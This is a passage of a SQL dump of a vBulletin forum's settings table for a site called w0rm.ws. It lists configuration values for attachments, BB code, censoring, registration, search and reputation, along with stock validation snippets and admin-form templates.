('album_thumbpath', 'version', '', '', '', 140, 0, 1, 'free', 'vbulletin', '', 0),
('album_thumbsize', 'useralbum', '150', '150', '', 30, 0, 1, 'integer', 'vbulletin', '', 0),
('album_thumburl', 'version', '', '', '', 150, 0, 1, 'free', 'vbulletin', '', 0),
('album_uploadamount', 'useralbum', '3', '3', '', 50, 0, 1, 'integer', 'vbulletin', '', 0),
('allowattachdel', 'attachment', '1', '1', 'yesno', 25, 0, 1, 'boolean', 'vbulletin', '', 0),
('allowbbcode', 'bbcode', '1', '1', 'yesno', 120, 0, 1, 'boolean', 'vbulletin', '', 0),
('allowbbimagecode', 'bbcode', '0', '', 'yesno', 140, 0, 1, 'boolean', 'vbulletin', '', 0),
('allowchangestyles', 'stylelang', '1', '1', 'yesno', 60, 0, 1, 'boolean', 'vbulletin', '', 0),
('allowclosedattachdel', 'attachment', '0', '', 'yesno', 27, 0, 1, 'boolean', 'vbulletin', '', 0),
('allowduplicates', 'attachment', '1', '1', 'yesno', 30, 0, 1, 'boolean', 'vbulletin', '', 0),
('allowedbbcodes', 'bbcode', '1023', '1023', 'bitfield:nocache|allowedbbcodes', 10, 0, 1, 'bitfield', 'vbulletin', '', 0),
('allowedreferrers', 'general', '', '', 'textarea', 330, 0, 1, 'free', 'vbulletin', '', 0),
('allowhtml', 'bbcode', '0', '', 'yesno', 150, 0, 1, 'boolean', 'vbulletin', '', 0),
('allowkeepbannedemail', 'banning', '1', '1', 'yesno', 40, 0, 1, 'boolean', 'vbulletin', '', 0),
('allowmultiregs', 'register', '0', '', 'yesno', 50, 0, 1, 'boolean', 'vbulletin', '', 0),
('allowphpinfo', 'server', '0', '', 'yesno', 10, 0, 1, 'boolean', 'vbulletin', '', 0),
('allowregistration', 'register', '0', '1', 'yesno', 10, 0, 1, 'boolean', 'vbulletin', '', 0),
('allowsmilies', 'bbcode', '1', '1', 'yesno', 130, 0, 1, 'boolean', 'vbulletin', '', 0),
('allowthreadedmode', 'threadedmode', '1', '1', 'yesno', 10, 0, 1, 'boolean', 'vbulletin', '', 0),
('allowwildcards', 'search_default', '1', '1', 'yesno', 70, 0, 1, 'boolean', 'vbulletin', '', 0),
('archiveenabled', 'archive', '1', '1', 'yesno', 10, 0, 1, 'boolean', 'vbulletin', '', 0),
('archive_postsperpage', 'archive', '250', '250', '', 30, 0, 1, 'posint', 'vbulletin', 'return (intval($raw_data) > 0);', 0),
('archive_threadsperpage', 'archive', '250', '250', '', 20, 0, 1, 'posint', 'vbulletin', 'return (intval($raw_data) > 0);', 0),
('archive_threadtype', 'archive', '1', '1', 'yesno', 15, 0, 1, 'boolean', 'vbulletin', '', 0),
('attachboxcount', 'attachment', '1', '1', 'select:piped\r\n0|0\r\n1|1\r\n2|2\r\n3|3\r\n4|4\r\n5|5\r\n6|6\r\n7|7\r\n8|8\r\n9|9\r\n10|10', 23, 0, 1, 'integer', 'vbulletin', '', 0),
('attachfile', 'version', '', '', 'radio:piped\r\n0|no\r\n1|yes(,)userid/userid.attach\r\n2|yes(,)u/s/e/r/i/d/userid.attach', 20, 0, 1, 'free', 'vbulletin', '', 1),
('attachlimit', 'attachment', '5', '5', '', 20, 0, 1, 'integer', 'vbulletin', '', 0),
('attachmentviewslive', 'server', '0', '', 'yesno', 41, 0, 1, 'boolean', 'vbulletin', '', 0),
('attachpath', 'version', '/path/to/your/attachment/directory', '/path/to/your/attachment/directory', '', 30, 0, 1, 'free', 'vbulletin', '', 1),
('attachresize', 'attachment', '1', '1', 'yesno', 35, 0, 1, 'number', 'vbulletin', '', 0),
('attachrow', 'attachment', '5', '5', '', 70, 0, 1, 'integer', 'vbulletin', '', 0),
('attachthumbs', 'attachment', '1', '1', 'select:piped\r\n0|no\r\n1|yes\r\n2|yes_with_border\r\n3|yes_with_dimensions\r\n4|yes_with_border_and_dimensions', 50, 0, 1, 'number', 'vbulletin', '', 0),
('attachthumbssize', 'attachment', '100', '100', '', 60, 0, 1, 'integer', 'vbulletin', '', 0),
('attachtotalspace', 'attachment', '0', '0', '', 10, 0, 1, 'number', 'vbulletin', '', 0),
('attachurlcount', 'attachment', '1', '1', 'select:piped\r\n0|0\r\n1|1\r\n2|2\r\n3|3\r\n4|4\r\n5|5\r\n6|6\r\n7|7\r\n8|8\r\n9|9\r\n10|10', 24, 0, 1, 'integer', 'vbulletin', '', 0),
('avatarenabled', 'userpix', '1', '1', 'yesno', 10, 0, 1, 'boolean', 'vbulletin', '', 0),
('avatarpath', 'version', './customavatars', './customavatars', '', 50, 0, 1, 'free', 'vbulletin', '', 1),
('avatarurl', 'version', 'customavatars', 'customavatars', '', 60, 0, 1, 'free', 'vbulletin', '', 1),
('badwords', 'search', '', '', 'textarea', 120, 0, 1, 'free', 'vbulletin', '', 0),
('banemail', 'banning', '', '', '\r\n', 30, 0, 1, 'free', 'vbulletin', '', 0),
('banip', 'banning', '', '', 'textarea', 20, 0, 1, 'free', 'vbulletin', '', 0),
('bbactive', 'onoff', '0', '1', 'yesno', 10, 0, 1, 'boolean', 'vbulletin', '', 0),
('bbclosedreason', 'onoff', 'Closed
', 'Sorry, the board is unavailable at the moment while we are testing some functionality.
\r\nWe will be back soon...
', 'textarea', 20, 0, 1, 'free', 'vbulletin', '', 0),
('bbtitle', 'address', 'w0rm.ws', 'vBulletin Forums', '', 10, 0, 1, 'free', 'vbulletin', '', 0),
('bburl', 'address', 'https://w0rm.ws:443', 'http://www.example.com/forums', '', 20, 0, 1, 'free', 'vbulletin', '', 0),
('blankasciistrip', 'censor', '160 173 u8205 u8204 u8237 u8238', '160 173 u8205 u8204 u8237 u8238', '', 40, 0, 1, 'free', 'vbulletin', '', 0),
('bounceemail', 'email', '', '', '', 85, 0, 1, 'free', 'vbulletin', '', 0),
('cachemaxage', 'server', '7', '7', '', 30, 0, 1, 'number', 'vbulletin', '', 0),
('calformat1', 'datetime', 'F j, Y', 'F j, Y', '', 60, 0, 1, 'free', 'vbulletin', '', 0),
('calformat2', 'datetime', 'F j', 'F j', '', 70, 0, 1, 'free', 'vbulletin', '', 0),
('censorchar', 'censor', '*', '*', '', 20, 0, 1, 'free', 'vbulletin', '', 0),
('censorwords', 'censor', '', '', 'textarea', 30, 0, 1, 'free', 'vbulletin', '', 0),
('checkcoppa', 'register', '0', '1', 'yesno', 17, 0, 1, 'number', 'vbulletin', '', 0),
('checknewpm', 'pm', '1', '1', 'yesno', 20, 0, 1, 'boolean', 'vbulletin', '', 0),
('cleargifurl', 'stylelang', 'clear.gif', 'clear.gif', '', 70, 0, 1, 'free', 'vbulletin', '', 0),
('codemaxlines', 'bbcode', '30', '30', '', 20, 0, 1, 'integer', 'vbulletin', '', 0),
('companyname', 'address', '', '', '', 90, 0, 1, 'free', 'vbulletin', '', 0),
('contactusemail', 'address', 'forum@w0rm.ws', '', '', 65, 0, 1, 'free', 'vbulletin', '', 0),
('contactuslink', 'address', 'sendmessage.php', 'sendmessage.php', '', 50, 0, 1, 'free', 'vbulletin', '', 0),
('contactusoptions', 'address', 'Site Feedback\r\nRegistration Problem', 'Site Feedback\r\nRegistration Problem', 'textarea', 55, 0, 1, 'free', 'vbulletin', '', 0),
('contactusother', 'address', '0', '1', 'yesno', 56, 0, 1, 'boolean', 'vbulletin', '', 0),
('contactustype', 'address', '0', '1', 'yesno', 53, 0, 1, 'boolean', 'vbulletin', '', 0),
('cookiedomain', 'http', '', '', 'cookiedomain', 30, 0, 1, 'free', 'vbulletin', '', 1),
('cookiepath', 'http', '/', '/', 'cookiepath', 20, 0, 1, 'free', 'vbulletin', '', 1),
('cookietimeout', 'http', '900', '900', '', 10, 0, 1, 'integer', 'vbulletin', 'return ($data >= 60);', 0),
('copypostindex', 'server', '1', '1', 'yesno', 250, 0, 1, 'boolean', 'vbulletin', '', 0),
('copyrighttext', 'address', '', '', '', 80, 0, 1, 'free', 'vbulletin', '', 0),
('cpstylefolder', 'admincp', 'vBulletin_3_Silver', 'vBulletin_3_Silver', 'cpstylefolder', 10, 0, 1, 'free', 'vbulletin', '', 0),
('cp_collapse_forums', 'admincp', '0', '', 'radio:piped\r\n0|default\r\n1|collapsible\r\n2|single', 40, 0, 1, 'number', 'vbulletin', '', 0),
('cp_usereditcolumns', 'admincp', '2', '2', 'radio:piped\r\n1|1\r\n2|2', 50, 0, 1, 'number', 'vbulletin', '', 0),
('ctCensorMod', 'user', '1', '1', 'yesno', 30, 0, 1, 'boolean', 'vbulletin', '', 0),
('ctCensorWords', 'user', 'admin forum moderator vbulletin leader', 'admin forum moderator vbulletin leader', 'textarea', 20, 0, 1, 'free', 'vbulletin', '', 0),
('ctMaxChars', 'user', '25', '25', '', 10, 0, 1, 'integer', 'vbulletin', '', 0),
('dateformat', 'datetime', 'm-d-Y', 'm-d-Y', '', 30, 0, 1, 'free', 'vbulletin', '', 0),
('datescore', 'searchfunc', '15', '15', '', 175, 0, 1, 'number', 'vbulletin', '', 0),
('defaultregoptions', 'register', '46629513', '46629513', '\r\n $vbphrase[yes] / $vbphrase[no] \r\n \r\n bf_misc_regoptions[\'adminemail\'] . \"\\\" id=\\\"cb_adminemail\\\" \" . ($setting[\'value\'] & $vbulletin->bf_misc_regoptions[\'adminemail\'] ? \'checked=\"checked\"\' : \'\') . \" />$vbphrase[receive_admin_emails] \r\n
\r\n \r\n bf_misc_regoptions[\'invisiblemode\'] . \"\\\" id=\\\"cb_invisible\\\" \" . ($setting[\'value\'] & $vbulletin->bf_misc_regoptions[\'invisiblemode\'] ? \'checked=\"checked\"\' : \'\') . \" />$vbphrase[invisible_mode] \r\n
\r\n \r\n bf_misc_regoptions[\'receiveemail\'] . \"\\\" id=\\\"cb_displayemail\\\" \" . ($setting[\'value\'] & $vbulletin->bf_misc_regoptions[\'receiveemail\'] ? \'checked=\"checked\"\' : \'\') . \" />$vbphrase[display_email] \r\n
\r\n \r\n bf_misc_regoptions[\'enablepm\'] . \"\\\" id=\\\"cb_receivepm\\\" \" . ($setting[\'value\'] & $vbulletin->bf_misc_regoptions[\'enablepm\'] ? \'checked=\"checked\"\' : \'\') . \" />$vbphrase[receive_private_messages] \r\n
\r\n \r\n bf_misc_regoptions[\'emailonpm\'] . \"\\\" id=\\\"cb_emailonpm\\\" \" . ($setting[\'value\'] & $vbulletin->bf_misc_regoptions[\'emailonpm\'] ? \'checked=\"checked\"\' : \'\') . \" />$vbphrase[send_notification_email_when_a_private_message_is_received] \r\n
\r\n \r\n bf_misc_regoptions[\'pmpopup\'] . \"\\\" id=\\\"cb_pmpopup\\\" \" . ($setting[\'value\'] & $vbulletin->bf_misc_regoptions[\'pmpopup\'] ? \'checked=\"checked\"\' : \'\') . \" />$vbphrase[pop_up_notification_box_when_a_private_message_is_received] \r\n
\r\n \r\n bf_misc_regoptions[\'pmdefaultsavecopy\'] . \"\\\" id=\\\"cb_pmdefaultsavecopy\\\" \" . ($setting[\'value\'] & $vbulletin->bf_misc_regoptions[\'pmdefaultsavecopy\'] ? \'checked=\"checked\"\' : \'\') . \" />\" . construct_phrase($vbphrase[\'save_pm_copy_default\'], \"../private.php?folderid=-1\") . \" \r\n
\r\n \r\n bf_misc_regoptions[\'vm_enable\'] . \"\\\" id=\\\"cb_vm_enable\\\" \" . ($setting[\'value\'] & $vbulletin->bf_misc_regoptions[\'vm_enable\'] ? \'checked=\"checked\"\' : \'\') . \" />$vbphrase[enable_visitor_messaging] \r\n
\r\n \r\n bf_misc_regoptions[\'vm_contactonly\'] . \"\\\" id=\\\"cb_vm_contactonly\\\" \" . ($setting[\'value\'] & $vbulletin->bf_misc_regoptions[\'vm_contactonly\'] ? \'checked=\"checked\"\' : \'\') . \" />$vbphrase[limit_vm_to_contacts_only] \r\n
\r\n \r\n bf_misc_regoptions[\'vcard\'] . \"\\\" id=\\\"cb_vcard\\\" \" . ($setting[\'value\'] & $vbulletin->bf_misc_regoptions[\'vcard\'] ? \'checked=\"checked\"\' : \'\') . \" />$vbphrase[allow_vcard_download] \r\n
\r\n \r\n bf_misc_regoptions[\'signature\'] . \"\\\" id=\\\"cb_sig\\\" \" . ($setting[\'value\'] & $vbulletin->bf_misc_regoptions[\'signature\'] ? \'checked=\"checked\"\' : \'\') . \" />$vbphrase[display_signatures] \r\n
\r\n \r\n bf_misc_regoptions[\'avatar\'] . \"\\\" id=\\\"cb_avatar\\\" \" . ($setting[\'value\'] & $vbulletin->bf_misc_regoptions[\'avatar\'] ? \'checked=\"checked\"\' : \'\') . \" />$vbphrase[display_avatars] \r\n
\r\n \r\n bf_misc_regoptions[\'image\'] . \"\\\" id=\\\"cb_images\\\" \" . ($setting[\'value\'] & $vbulletin->bf_misc_regoptions[\'image\'] ? \'checked=\"checked\"\' : \'\') . \" />$vbphrase[display_images] \r\n
\r\n \r\n bf_misc_regoptions[\'showreputation\'] . \"\\\" id=\\\"cb_reputation\\\" \" . ($setting[\'value\'] & $vbulletin->bf_misc_regoptions[\'showreputation\'] ? \'checked=\"checked\"\' : \'\') . \" />$vbphrase[display_reputation] \r\n
\r\n \r\n \r\n\r\n $vbphrase[options] \r\n \r\n $vbphrase[auto_subscription_mode] \r\n \r\n bf_misc_regoptions[\'subscribe_none\'] . \"\\\" \" . ($setting[\'value\'] & $vbulletin->bf_misc_regoptions[\'subscribe_none\'] ? \'selected=\"selected\"\' : \'\') . \">$vbphrase[subscribe_choice_none] \r\n bf_misc_regoptions[\'subscribe_nonotify\'] . \"\\\" \" . ($setting[\'value\'] & $vbulletin->bf_misc_regoptions[\'subscribe_nonotify\'] ? \'selected=\"selected\"\' : \'\') . \">$vbphrase[subscribe_choice_0] \r\n bf_misc_regoptions[\'subscribe_instant\'] . \"\\\" \" . ($setting[\'value\'] & $vbulletin->bf_misc_regoptions[\'subscribe_instant\'] ? \'selected=\"selected\"\' : \'\') . \">$vbphrase[subscribe_choice_1] \r\n bf_misc_regoptions[\'subscribe_daily\'] . \"\\\" \" . ($setting[\'value\'] & $vbulletin->bf_misc_regoptions[\'subscribe_daily\'] ? \'selected=\"selected\"\' : \'\') . \">$vbphrase[subscribe_choice_2] \r\n bf_misc_regoptions[\'subscribe_weekly\'] . \"\\\" \" . ($setting[\'value\'] & $vbulletin->bf_misc_regoptions[\'subscribe_weekly\'] ? \'selected=\"selected\"\' : \'\') . \">$vbphrase[subscribe_choice_3] \r\n \r\n
\r\n \r\n $vbphrase[message_editor_interface] \r\n \r\n bf_misc_regoptions[\'vbcode_none\'] . \"\\\" \" . ($setting[\'value\'] & $vbulletin->bf_misc_regoptions[\'vbcode_none\'] ? \'selected=\"selected\"\' : \'\') . \">$vbphrase[do_not_show_editor_toolbar] \r\n bf_misc_regoptions[\'vbcode_standard\'] . \"\\\" \" . ($setting[\'value\'] & $vbulletin->bf_misc_regoptions[\'vbcode_standard\'] ? \'selected=\"selected\"\' : \'\') . \">$vbphrase[show_standard_editor_toolbar] \r\n bf_misc_regoptions[\'vbcode_enhanced\']. \"\\\" \" . ($setting[\'value\'] & $vbulletin->bf_misc_regoptions[\'vbcode_enhanced\'] ? \'selected=\"selected\"\' : \'\') . \">$vbphrase[show_enhanced_editor_toolbar] \r\n \r\n
\r\n \r\n $vbphrase[thread_display_mode] \r\n \r\n bf_misc_regoptions[\'thread_linear_oldest\'] . \"\\\" \" . ($setting[\'value\'] & $vbulletin->bf_misc_regoptions[\'thread_linear_oldest\'] ? \'selected=\"selected\"\' : \'\') . \">$vbphrase[linear] - $vbphrase[oldest_first] \r\n bf_misc_regoptions[\'thread_linear_newest\'] . \"\\\" \" . ($setting[\'value\'] & $vbulletin->bf_misc_regoptions[\'thread_linear_newest\'] ? \'selected=\"selected\"\' : \'\') . \">$vbphrase[linear] - $vbphrase[newest_first] \r\n bf_misc_regoptions[\'thread_threaded\'] . \"\\\" \" . ($setting[\'value\'] & $vbulletin->bf_misc_regoptions[\'thread_threaded\'] ? \'selected=\"selected\"\' : \'\') . \">$vbphrase[threaded] \r\n bf_misc_regoptions[\'thread_hybrid\'] . \"\\\" \" . ($setting[\'value\'] & $vbulletin->bf_misc_regoptions[\'thread_hybrid\'] ? \'selected=\"selected\"\' : \'\') . \">$vbphrase[hybrid] \r\n \r\n
\r\n ', 130, 0, 1, 'bitfield', 'vbulletin', '', 0),
('description', 'general', 'w0rm.in * not so public IT community', 'This is a discussion forum powered by vBulletin.', '', 20, 0, 1, 'free', 'vbulletin', '', 0),
('disableerroremail', 'errorhandling', '0', '', 'yesno', 50, 0, 1, 'boolean', 'vbulletin', '', 0),
('disable_ajax', 'general', '0', '0', 'select:piped\r\n0|enable_all_ajax_features\r\n1|disable_problematic_ajax_features\r\n2|disable_all_ajax_features', 360, 0, 1, 'number', 'vbulletin', '', 0),
('displayemails', 'email', '0', '1', 'yesno', 20, 0, 1, 'boolean', 'vbulletin', '', 0),
('displayloggedin', 'forumhome', '1', '1', 'select:piped\r\n0|no\r\n1|yes_alphabetical_all\r\n3|yes_alphabetical_members\r\n2|yes_random_all\r\n4|yes_random_members', 10, 0, 1, 'number', 'vbulletin', '', 0),
('dstonoff', 'datetime', '0', '', 'yesno', 25, 0, 1, 'boolean', 'vbulletin', '', 0),
('editormodes', 'postiface', 'a:3:{s:2:\"fe\";i:2;s:2:\"qr\";i:2;s:2:\"qe\";i:2;}', 'a:3:{s:2:\"fe\";i:2;s:2:\"qr\";i:2;s:2:\"qe\";i:2;}', '\r\n \r\n\r\n $vbphrase[options] \r\n \r\n $vbphrase[full_editor] \r\n \r\n $vbphrase[disable_controls] \r\n $vbphrase[enable_standard_controls] \r\n $vbphrase[enable_standard_and_wysiwyg_controls] \r\n \r\n
\r\n \r\n $vbphrase[quick_reply] \r\n \r\n $vbphrase[disable_controls] \r\n $vbphrase[enable_standard_controls] \r\n $vbphrase[enable_standard_and_wysiwyg_controls] \r\n \r\n
\r\n \r\n $vbphrase[quick_edit] \r\n \r\n $vbphrase[disable_controls] \r\n $vbphrase[enable_standard_controls] \r\n $vbphrase[enable_standard_and_wysiwyg_controls] \r\n \r\n
\r\n ', 5, 0, 1, 'free', 'vbulletin', '', 0),
('editthreadtitlelimit', 'posting', '5', '5', '', 210, 0, 1, 'number', 'vbulletin', '', 0),
('edittimelimit', 'posting', '0', '0', '', 220, 0, 1, 'number', 'vbulletin', '', 0),
('emailfloodtime', 'email', '60', '60', '', 40, 0, 1, 'integer', 'vbulletin', '', 0),
('emailsendnum', 'email', '10', '10', '', 80, 0, 1, 'integer', 'vbulletin', '', 0),
('enableaccess', 'general', '0', '1', 'yesno', 60, 0, 1, 'boolean', 'vbulletin', '', 0),
('enablebanning', 'banning', '1', '1', 'yesno', 10, 0, 1, 'boolean', 'vbulletin', '', 0),
('enablecensor', 'censor', '1', '1', 'yesno', 10, 0, 1, 'boolean', 'vbulletin', '', 0),
('enableemail', 'email', '0', '1', 'yesno', 10, 0, 1, 'boolean', 'vbulletin', '', 0),
('enablehooks', 'plugin', '1', '0', 'yesno', 10, 0, 1, 'boolean', 'vbulletin', '', 0),
('enablememberlist', 'memberlist', '0', '1', 'yesno', 10, 0, 1, 'boolean', 'vbulletin', '', 0),
('enablepms', 'pm', '1', '1', 'yesno', 10, 0, 1, 'boolean', 'vbulletin', '', 0),
('enablesearches', 'search', '1', '1', 'yesno', 10, 0, 1, 'boolean', 'vbulletin', '', 0),
('enablespiders', 'online', '0', '', 'yesno', 50, 0, 1, 'boolean', 'vbulletin', '', 0),
('enable_inlinemod_auth', 'general', '1', '1', 'yesno', 370, 0, 1, 'boolean', 'vbulletin', '', 0),
('errorlogdatabase', 'errorhandling', '', '', '', 10, 0, 1, 'free', 'vbulletin', '', 0),
('errorlogemail', 'errorhandling', '', '', '', 35, 0, 1, 'free', 'vbulletin', '', 0),
('errorlogmaxsize', 'errorhandling', '1048576', '1048576', '', 40, 0, 1, 'number', 'vbulletin', '', 0),
('errorlogphp', 'errorhandling', '', '', '', 30, 0, 1, 'free', 'vbulletin', '', 0),
('errorlogsecurity', 'errorhandling', '', '', '', 20, 0, 1, 'free', 'vbulletin', '', 0),
('externalcache', 'external', '60', '60', 'input:5', 50, 0, 1, 'number', 'vbulletin', 'return ($data > 0 AND $data <= 1440);', 0),
('externalcount', 'external', '15', '15', '', 60, 0, 1, 'integer', 'vbulletin', '', 0),
('externalcutoff', 'external', '30', '30', 'input:5', 40, 0, 1, 'number', 'vbulletin', '', 0),
('externaljs', 'external', '0', '', 'yesno', 10, 0, 1, 'boolean', 'vbulletin', '', 0),
('externalrss', 'external', '1', '', 'yesno', 20, 0, 1, 'boolean', 'vbulletin', '', 0),
('externalxml', 'external', '0', '', 'yesno', 30, 0, 1, 'boolean', 'vbulletin', '', 0),
('faxnumber', 'address', '', '', '', 100, 0, 1, 'free', 'vbulletin', '', 0),
('floodchecktime', 'posting', '30', '30', '', 90, 0, 1, 'integer', 'vbulletin', '', 0),
('forumdisplaydepth', 'forumlist', '2', '2', '', 15, 0, 1, 'integer', 'vbulletin', '', 0),
('forumhome', 'forumhome', 'index', 'index', '', 1, 0, 1, 'free', 'vbulletin', '', 0),
('forumhomedepth', 'forumlist', '2', '2', '', 10, 0, 1, 'integer', 'vbulletin', '', 0),
('forumleaders', 'general', '0', '1', 'select:piped\r\n0|no\r\n1|yes\r\n2|yes_but_disable_moderators', 320, 0, 1, 'number', 'vbulletin', '', 0),
('friends_per_page', 'user', '10', '10', '', 40, 0, 1, 'posint', 'vbulletin', 'return (intval($raw_data) > 0);', 0),
('fulltextsearch', 'version', '0', '0', 'yesno', 110, 0, 1, 'boolean', 'vbulletin', '', 1),
('globalignore', 'banning', '', '', '', 50, 0, 1, 'free', 'vbulletin', 'return (preg_match(\'#^(\\d+ *)*$#\', $data) > 0);', 0),
('gm_maxchars', 'social_groups', '1000', '1000', '', 40, 0, 1, 'integer', 'vbulletin', 'return (intval($raw_data) >= 0);', 0),
('gm_maxperpage', 'social_groups', '50', '50', '', 80, 0, 1, 'posint', 'vbulletin', 'return (intval($raw_data) > 0);', 0),
('gm_perpage', 'social_groups', '10', '10', '', 70, 0, 1, 'posint', 'vbulletin', 'return (intval($raw_data) > 0);', 0),
('goodwords', 'search_default', 'vb vbb php sql', 'vb vbb php sql', 'textarea', 45, 0, 1, 'free', 'vbulletin', '', 0),
('groupiconpath', 'version', './customgroupicons', './customgroupicons', '', 165, 0, 1, 'free', 'vbulletin', '', 1),
('groupiconurl', 'version', 'customgroupicons', 'customgroupicons', '', 170, 0, 1, 'free', 'vbulletin', '', 1),
('gziplevel', 'http', '1', '1', '', 110, 0, 1, 'number', 'vbulletin', '', 0),
('gzipoutput', 'http', '1', '1', 'yesno', 100, 0, 1, 'boolean', 'vbulletin', '', 0),
('hometitle', 'address', '', 'Home Page', '', 30, 0, 1, 'free', 'vbulletin', '', 0),
('homeurl', 'address', 'https://w0rm.ws:443', 'http://www.example.com/', '', 40, 0, 1, 'free', 'vbulletin', '', 0),
('hotnumberposts', 'forumdisplay', '15', '15', '', 120, 0, 1, 'integer', 'vbulletin', '', 0),
('hotnumberviews', 'forumdisplay', '150', '150', '', 110, 0, 1, 'integer', 'vbulletin', '', 0),
('hvcheck', 'humanverification', '14', '31', 'bitfield:misc|hvcheck', 300, 0, 1, 'bitfield', 'vbulletin', '', 0),
('hv_recaptcha_privatekey', 'version', '', '', '', 24, 0, 1, 'free', 'vbulletin', '', 0),
('hv_recaptcha_publickey', 'version', '', '', '', 22, 0, 1, 'free', 'vbulletin', '', 0),
('hv_recaptcha_theme', 'version', 'white', 'white', 'radio:piped\r\nred|recaptcha_red\r\nwhite|recaptcha_white\r\nblackglass|recaptcha_blackglass\r\nclean|recaptcha_clean', 25, 0, 1, 'free', 'vbulletin', '', 0),
('hv_type', 'version', '0', 'Image', 'radio:piped\r\n0|disabled\r\nImage|image_verification\r\nQuestion|question_verification\r\nRecaptcha|recaptcha', 20, 0, 1, 'free', 'vbulletin', '', 0),
('ie8render7', 'http', '1', '1', 'yesno', 210, 0, 1, 'boolean', 'vbulletin', '', 0),
('ignoremods', 'user', '0', '', 'yesno', 300, 0, 1, 'boolean', 'vbulletin', '', 0),
('ignorequotechars', 'posting', '1', '1', 'yesno', 35, 0, 1, 'boolean', 'vbulletin', '', 0),
('illegalusernames', 'register', '', '', '', 100, 0, 1, 'free', 'vbulletin', '', 0),
('imagetype', 'imagesettings', 'GD', 'GD', 'radio:piped\r\n0|none\r\nGD|GD\r\nMagick|ImageMagick 6', 15, 0, 1, 'free', 'vbulletin', '', 0),
('ipcheck', 'server', '1', '1', 'select:piped\r\n0|255.255.255.255\r\n1|255.255.255.0\r\n2|255.255.0.0', 260, 0, 1, 'number', 'vbulletin', '', 0),
('keywords', 'general', 'w0rm,w0rm.in', 'vbulletin,vBulletin Solutions,forum,bbs,discussion,bulletin board', '', 10, 0, 1, 'free', 'vbulletin', '', 0),
('kppower', 'reputation', '100', '100', '', 90, 0, 1, 'number', 'vbulletin', '', 0),
('languageid', 'stylelang', '1', '1', 'radio:eval\r\n$options = fetch_language_titles_array();', 10, 0, 1, 'number', 'vbulletin', '', 1),
('lastthreadchars', 'forumlist', '30', '30', '', 50, 0, 1, 'integer', 'vbulletin', '', 0),
('legacypostbit', 'stylelang', '0', '', 'yesno', 100, 0, 1, 'boolean', 'vbulletin', '', 0),
('lightboxenabled', 'attachment', '1', '1', 'select:piped\r\n0|no\r\n1|yes_click\r\n2|yes_hover\r\n3|yes_click_or_hover', 90, 0, 1, 'number', 'vbulletin', '', 0),
('linktopages', 'forumdisplay', '1', '1', 'yesno', 200, 0, 1, 'boolean', 'vbulletin', '', 0),
('loadlimit', 'server', '0', '0', '', 110, 0, 1, 'number', 'vbulletin', '', 0),
('logdateformat', 'datetime', 'H:i, jS M Y', 'H:i, jS M Y', '', 80, 0, 1, 'free', 'vbulletin', '', 0),
('logip', 'posting', '1', '1', 'select:piped\r\n0|do_not_log_ip\r\n1|display_but_require_admin_or_mod\r\n2|display_publicly', 240, 0, 1, 'number', 'vbulletin', '', 0),
('magickpath', 'imagesettings', '', '', '', 40, 0, 1, 'free', 'vbulletin', '', 0),
('markinglimit', 'general', '10', '10', '', 350, 0, 1, 'number', 'vbulletin', '', 0),
('maximages', 'posting', '4', '4', '', 50, 0, 1, 'number', 'vbulletin', '', 0),
('maxmultipage', 'forumdisplay', '3', '3', '', 210, 0, 1, 'integer', 'vbulletin', '', 0),
('maxpolllength', 'poll', '100', '100', '', 15, 0, 1, 'integer', 'vbulletin', '', 0),
('maxpolloptions', 'poll', '10', '10', '', 10, 0, 1, 'integer', 'vbulletin', '', 0),
('maxposts', 'showthread', '10', '10', '', 20, 0, 1, 'posint', 'vbulletin', 'return (intval($raw_data) > 0);', 0),
('maxreputationperday', 'reputation', '10', '10', '', 120, 0, 1, 'integer', 'vbulletin', '', 0),
('maxresults', 'search', '500', '500', '', 40, 0, 1, 'integer', 'vbulletin', '', 0),
('maxsearchlength', 'search', '20', '20', '', 60, 0, 1, 'integer', 'vbulletin', '', 0),
('maxthreads', 'forumdisplay', '20', '20', '', 20, 0, 1, 'posint', 'vbulletin', 'return (intval($raw_data) > 0);', 0),
('maxuserlength', 'register', '25', '25', '', 90, 0, 1, 'integer', 'vbulletin', '', 0),
('memberlistfields', 'memberlist', '0', '216', 'bitfield:nocache|memberlistfields', 20, 0, 1, 'bitfield', 'vbulletin', '', 0),
('memberlistperpage', 'memberlist', '30', '30', '', 30, 0, 1, 'posint', 'vbulletin', 'return (intval($raw_data) > 0);', 0),
('memberlistposts', 'memberlist', '0', '0', '', 15, 0, 1, 'integer', 'vbulletin', '', 0),
('minifriends_amount', 'user', '6', '6', '', 30, 0, 1, 'integer', 'vbulletin', '', 0),
('minreputationcount', 'reputation', '10', '10', '', 110, 0, 1, 'number', 'vbulletin', '', 0),
('minreputationpost', 'reputation', '50', '50', '', 100, 0, 1, 'number', 'vbulletin', '', 0),
('minsearchlength', 'search', '4', '4', '', 50, 0, 1, 'integer', 'vbulletin', '', 0),
('minuserlength', 'register', '3', '3', '', 80, 0, 1, 'integer', 'vbulletin', '', 0),
('moderatenewmembers', 'register', '0', '', 'yesno', 20, 0, 1, 'boolean', 'vbulletin', '', 0),
('mqlimit', 'posting', '0', '0', '', 26, 0, 1, 'integer', 'vbulletin', '', 0),
('multimatchscore', 'searchfunc', '15', '15', '', 100, 0, 1, 'number', 'vbulletin', '', 0),
('multiquote', 'posting', '1', '1', 'yesno', 25, 0, 1, 'free', 'vbulletin', '', 0),
('nav_forumdesc', 'forumdisplay', '0', '0', 'yesno', 1, 0, 1, 'boolean', 'vbulletin', '', 0),
('needfromemail', 'email', '0', '', 'yesno', 90, 0, 1, 'boolean', 'vbulletin', '', 0),
('newuseremail', 'register', '', '', '', 40, 0, 1, 'free', 'vbulletin', '', 0),
('nocacheheaders', 'http', '0', '', 'yesno', 220, 0, 1, 'boolean', 'vbulletin', '', 0),
('noeditedbytime', 'posting', '2', '2', '', 230, 0, 1, 'number', 'vbulletin', '', 0),
('numavatarsperpage', 'userpix', '10', '10', '', 30, 0, 1, 'posint', 'vbulletin', 'return (intval($raw_data) > 0);', 0),
('numavatarswide', 'userpix', '5', '5', '', 20, 0, 1, 'integer', 'vbulletin', '', 0),
('oneannounce', 'forumdisplay', '1', '1', 'yesno', 230, 0, 1, 'boolean', 'vbulletin', '', 0),
('pagenavpages', 'general', '3', '3', '', 50, 0, 1, 'number', 'vbulletin', '', 0),
('pagenavs', 'general', '10 50 100 500 1000', '10 50 100 500 1000', '', 55, 0, 1, 'free', 'vbulletin', '', 0),
('paymentemail', 'paidsubs', '', '', '', 10, 0, 1, 'free', 'vbulletin', '', 0),
('pcpower', 'reputation', '1000', '1000', '', 80, 0, 1, 'number', 'vbulletin', '', 0),
